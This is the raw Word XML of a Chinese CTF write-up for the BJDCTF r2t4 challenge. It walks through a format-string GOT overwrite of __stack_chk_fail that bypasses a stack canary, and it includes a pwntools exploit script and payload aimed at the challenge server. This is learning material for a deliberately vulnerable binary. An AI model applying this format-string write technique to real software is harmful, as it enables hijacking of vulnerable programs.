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65D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065D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CA065D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BJDCTF_r2t4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考点：用格式化字符串写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__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函数来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bypass canary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由于涉及到格式化字符串漏洞的利用，所以基本原理和利用方法要先有一定的了解。推荐先阅读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CTF-wiki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CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>格式化字符串漏洞原理介绍</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>格式化字符串漏洞利用</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA06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0" w:name="t1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CA06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1.首先检查程序的基础信息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3525500" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="image-20200326175149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003261751498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位程序，可以看到开启了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NX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防护</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA06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1" w:name="t2"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00CA06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2.运行程序，对程序功能有基本了解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3677900" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="image-2020032617593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-202003261759346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程序基本功能：对用户输入对内容进行输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA06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2" w:name="t3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00CA06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3.用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA06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ida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA06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打开进行分析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这里截取了关键部分对代码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8288000" cy="10287000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕快照 2020-03-26 18.05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 2020-03-26 18.05.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首先在主函数中我们可以非常清楚的看到格式化字符串漏洞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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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);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并且经过分析可以发现还存在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栈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溢出漏洞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-&gt; </w:t>
      </w:r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read(0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, 0x38uLL);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，但是由于此程序开启了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保护，所以我们想要溢出就必须绕过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防护。要绕过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防护最先想到的就是泄漏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canary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。因为这里有格式化字符串漏洞，所以想要泄漏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canary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并不难。但要实现攻击我们需要先泄漏后溢出，显然这里不行。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考虑了这些以后，我通过阅读相关绕过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canary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的技术的文章后了解到了劫持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__ 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函数方法。（其实这里很明显就是构造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payload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劫持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__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函数，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很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基础的那种，是我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太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菜了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA065D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="宋体" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="4D4D4D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>😢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__ 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stack_check_fail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本质上也只是动态加载的一个库函数，和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puts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是一样的。如果程序中没有调用别的可控函数，那么就可以先劫持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__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函数，再故意引发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canary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错误，从而调用目标函数。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查看程序中的后门函数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8288000" cy="10287000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="屏幕快照 2020-03-26 18.05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 2020-03-26 18.05.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现在整理一下思路，利用格式化字符串漏洞修改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got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表中的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__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函数为我们的后门函数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backdoor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的地址，再故意造成溢出从而执行后门函数。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另外要注意的是此程序为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位，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位和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32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位程序的格式化字符串漏洞利用是有差别的。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32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位的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payload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payload = p32(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泄露地址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) + %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偏移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$x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，这不适用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位。因为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位地址高位多为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‘\00’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，这样就会使我们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send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的地址和我们构造的格式化字符串中间还有好多个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‘\00’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，而在字符串中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‘\00’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就代表了结束，所以在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printf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到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’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\00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’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时，就被认为字符串已经结束了，自然不会继续往后面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printf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了。所以我们需要把地址放到后面！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）或许有人会这么构造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payload = ‘a’ * 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backdoor_addr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+ %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偏移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$n + p64(__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，但想想这里要读入多少个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’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a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’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啊！谁的程序中会一次读取那么多字符？所以要换为另一个格式字符，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%c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，读入的字符屈指可数，但经过格式化漏洞转换后，那就是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num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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个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字符的输出同样可以达到相同的修改数据的效果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3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位程序，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printf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在输出大量字符时有时会异常，就像前面一次性读入大量字符会异常一样，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printf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在一次性输出这么大量的字符时也会出现异常。所以解决办法便是一个一个字节来做出修改或者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两个两个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来，具体怎么修改这里不展开讲了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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以上知识均来自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丁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_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丫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师傅的</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>位格式化字符串漏洞修改</w:t>
        </w:r>
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>got</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>表利用</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00CA065D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="6795B5"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>详解</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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另外附上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H4lo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师傅的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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit-zh/" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00CA065D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6795B5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>格式化字符串任意地址写操作学习小计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fldChar w:fldCharType="end"/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我们先确定偏移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手动计算：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5773400" cy="1165860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="屏幕快照 2020-03-26 21.16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 2020-03-26 21.16.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直接用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libformatstr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计算：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24589740" cy="6858000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="屏幕快照 2020-03-26 21.2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 2020-03-26 21.23.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7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可知确定偏移为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接下来查看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backdoor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函数地址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0x400626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2931140" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="image-2020032621471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003262147111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1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接下来我们就可以试着写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exp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了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A065D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from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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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A065D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*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proofErr w:type="spellStart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context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log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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'debug'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p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remote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"node3.buuoj.cn"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A065D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29497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elf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ELF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proofErr w:type="gramStart"/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'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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r2t4'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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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stack_chk_fail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart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elf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got</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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stack_chk_fail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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A065D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print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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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p64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__stack_chk_fail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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA065D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))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pay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"%64c%9$hn%1510c%10$hnAAA"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+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p64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__stack_chk_fail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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA065D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A065D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+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p64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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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stack_chk_fail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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A065D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#pay = "%4195878c%8$nAAA" + p64(__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA065D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stack_chk_fail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA065D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) + "a"*17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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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pay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A065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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</w:t>
      </w:r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A065D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interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA065D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1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2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3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4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5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6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lastRenderedPageBreak/>
        <w:t>7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8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9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10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11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12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13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA065D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>14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这里对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payload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稍作解释，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0x40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，对应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backdoor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函数地址的高两字节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0x0040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9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：由于格式化字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA06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%64c%9$hn%1510c%10$hnAAA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占用了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24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个字节，根据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64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程序，所以偏移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6+3=9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$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hn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：将已输出的字符数低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字节写到指定地址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1510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1510+64=1574=0x626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，对应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backdoor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函数地址的低两字节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0x0626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10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：在偏移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9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的基础上加上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p64(__stack_chk_fail+2)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地址的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一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字节，即偏移为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10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AAA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：填充作用，</w:t>
      </w:r>
      <w:proofErr w:type="gram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栈</w:t>
      </w:r>
      <w:proofErr w:type="gram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对齐，使之为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8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的倍数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p64(__ stack_chk_fail+2) + p64(__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stack_chk_fail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) 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：将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backdoor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函数地址分为高两个字节和低两字节进行写入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我是刚刚入门</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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两个月的萌新，如有错漏之处，敬请指正！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA065D" w:rsidRPr="00CA065D" w:rsidRDefault="00CA065D" w:rsidP="00CA065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t>参考链接：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br/>
        <w:t>https://www.anquanke.com/post/id/194458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br/>
        <w:t>https://www.anquanke.com/post/id/180009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br/>
        <w:t>https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro-zh/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA065D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_example-zh/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07AEA" w:rsidRPr="00CA065D" w:rsidRDefault="00A07AEA">
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:sectPr w:rsidR="00A07AEA" w:rsidRPr="00CA0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E85143"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E02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53B"/>
    <w:rsid w:val="0016153B"/>
    <w:rsid w:val="00A07AEA"/>
    <w:rsid w:val="00CA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CE6E2-E41E-4C64-B668-C2BCC615D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A065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A065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A065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A065D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A06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A065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A065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A06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A065D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CA06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2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tf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit-zh/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anquanke.com/post/id/194458" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_intro-zh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412</Words>
  <Characters>2353</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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stare</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>stare</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-25T07:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-25T07:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>